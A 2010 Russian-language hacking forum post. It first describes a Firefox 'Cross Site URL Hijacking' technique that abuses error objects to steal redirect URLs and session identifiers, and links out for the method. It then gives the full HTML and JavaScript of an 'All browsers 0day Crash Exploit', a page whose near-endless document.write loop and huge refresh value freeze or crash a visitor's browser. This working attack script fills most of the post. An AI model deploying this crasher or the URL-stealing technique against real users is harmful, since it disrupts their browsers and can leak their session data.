28.05.2010, 13:36
|
|
Новичок
Регистрация: 01.01.2009
Сообщений: 27
Провел на форуме:
125085
Репутация:
31
|
|
Cross Site URL Hijacking by using Error Object in Mozilla Firefox
XSUH атаки используется, чтобы украсть URL другого веб-сайта. Этот URL может показать статус клиента на этом сайте, и он может содержать конфиденциальную информацию, такую как идентификатор сессии и т.п.
Как вы знаете, сценарии обработки ошибок в Mozilla Firefox являются весьма полезными для разработчиков, они могут показать точный источник ошибки и другую полезную информацию. Теперь эта функция может быть использована для кражи URL после редиректа (XSUH атака), что может привести к утечке конфиденциальной информации.
Сама техника проведения атаки здесь [eng]
Примерчик
Было протестированно на Mozilla Firefox 3.6.3, 3.5.9, 3.6.4 build 5 ( 26.05.2010).
===================================
All browsers 0day Crash Exploit (2)
===================================
Код:
<html>
<head>
<meta http-equiv="Refresh" content="999999999999999999999999999999999999">
<title>Crasher</title></head>
<html>
<body bgcolor="black">
<center>
<font color="red">
<br>
<br>
<br>
<br>
<script language="javascript">
now=new Date();
document.write(now+"<br>");
h=now.getHours();
m=now.getMinutes();
s=now.getSeconds();
document.write("<font size='+5'>");
for (i =0;i<99999999999999999;i++) {
document.write('<html><marquee><h1>'+h+":"+m+":"+s);
}
alert('aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa')
</script>
</center>
</font>
</body>
</html>
Последний раз редактировалось lzr; 28.05.2010 в 17:11..
|
|
|